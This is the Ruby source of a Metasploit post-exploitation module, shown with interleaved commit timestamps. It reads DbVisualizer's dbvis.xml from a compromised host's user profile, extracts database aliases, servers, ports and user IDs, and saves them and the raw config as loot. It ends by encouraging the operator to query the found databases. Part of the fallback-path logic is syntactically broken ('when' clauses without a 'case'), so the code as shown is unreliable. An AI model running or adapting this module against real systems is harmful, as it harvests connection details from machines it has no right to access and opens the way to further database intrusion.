metasploit-framework/modules/post/multi/gather/dbvis_enum.rb

180 lines
4.9 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
2014-07-14 20:49:19 +00:00
'Name' => 'Multi Gather Dbvis Connections Settings',
'Description' => %q{
DbVisualizer stores the user database configuration in dbvis.xml.
2014-07-14 19:39:34 +00:00
This module retrieves the connections settings from this file.
},
'License' => MSF_LICENSE,
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
'Platform' => %w{ linux win },
'SessionTypes' => [ 'meterpreter', 'shell']
))
end
def run
db_table = Rex::Ui::Text::Table.new(
2014-07-14 20:45:17 +00:00
'Header' => "Dbvis Databases",
'Indent' => 2,
'Columns' =>
[
"Alias",
"Type",
"Server",
"Port",
"Database",
"Namespace",
"Userid",
])
dbs = []
case session.platform
when /linux/
user = session.shell_command("whoami").chomp
print_status("Current user is #{user}")
if (user =~ /root/)
2014-07-14 19:39:34 +00:00
user_base = "/root/"
else
user_base="/home/#{user}/"
end
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
when /win/
if session.type =~ /meterpreter/
user_profile = session.sys.config.getenv('USERPROFILE')
else
user_profile = cmd_exec("echo %USERPROFILE%").strip
end
dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
end
2014-07-14 20:24:53 +00:00
unless file?(dbvis_file)
print_status("File not found: #{dbvis_file}")
print_status("This could be an older version of dbvis, trying old path")
when /linux/
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
when /win/
dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
end
unless file?(dbvis_file)
print_error("File not found: #{dbvis_file}")
return
end
end
db = {}
print_status("Reading: #{dbvis_file}")
2014-07-14 19:39:34 +00:00
dbfound = false
2014-07-14 20:27:40 +00:00
raw_xml = ""
begin
raw_xml = read_file(dbvis_file)
rescue EOFError
# If there's nothing in the file, we hit EOFError
print_error("Nothing read from file: #{dbvis_file}, file may be empty")
return
end
# read config file
2014-07-14 20:27:40 +00:00
raw_xml.each_line do |line|
2014-07-14 19:39:34 +00:00
if line =~ /<Database id=/
dbfound = true
elsif line =~ /<\/Database>/
dbfound=false
if db[:Database].nil?
db[:Database] = "";
end
if db[:Namespace].nil?
db[:Namespace] = "";
end
# save
dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] )
db = {}
end
if dbfound == true
2014-07-14 19:39:34 +00:00
# get the alias
if (line =~ /<Alias>([\S+\s+]+)<\/Alias>/i)
db[:Alias] = $1
end
# get the type
if (line =~ /<Type>([\S+\s+]+)<\/Type>/i)
db[:Type] = $1
end
# get the user
if (line =~ /<Userid>([\S+\s+]+)<\/Userid>/i)
db[:Userid] = $1
end
# get the server
if (line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i)
db[:Server] = $1
end
# get the port
if (line =~ /<UrlVariable UrlVariableName="Port">([\S+]+)<\/UrlVariable>/i)
db[:Port] = $1
end
# get the database
if (line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i)
db[:Database] = $1
end
# get the Namespace
if (line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i)
db[:Namespace] = $1
end
end
end
2014-07-14 19:39:34 +00:00
2014-07-14 20:14:54 +00:00
# print out
dbs.each do |db|
if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
print_good("Reporting #{db[:Server]} ")
report_host(:host => db[:Server]);
end
2014-07-14 20:14:54 +00:00
db_table << [ db[:Alias] , db[:Type] , db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid]]
end
2014-07-14 20:14:54 +00:00
if db_table.rows.empty?
print_status("No database settings found")
else
print_line("\n")
print_line(db_table.to_s)
print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !")
print_good("")
# store found databases
p = store_loot(
"dbvis.databases",
"text/csv",
session,
db_table.to_csv,
"dbvis_databases.txt",
"dbvis databases")
2014-07-14 20:14:54 +00:00
print_good("Databases settings stored in: #{p.to_s}")
end
2014-07-14 20:14:54 +00:00
print_status("Downloading #{dbvis_file}")
p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
print_good "dbvis.xml saved to #{p.to_s}"
2014-07-14 20:17:54 +00:00
end
end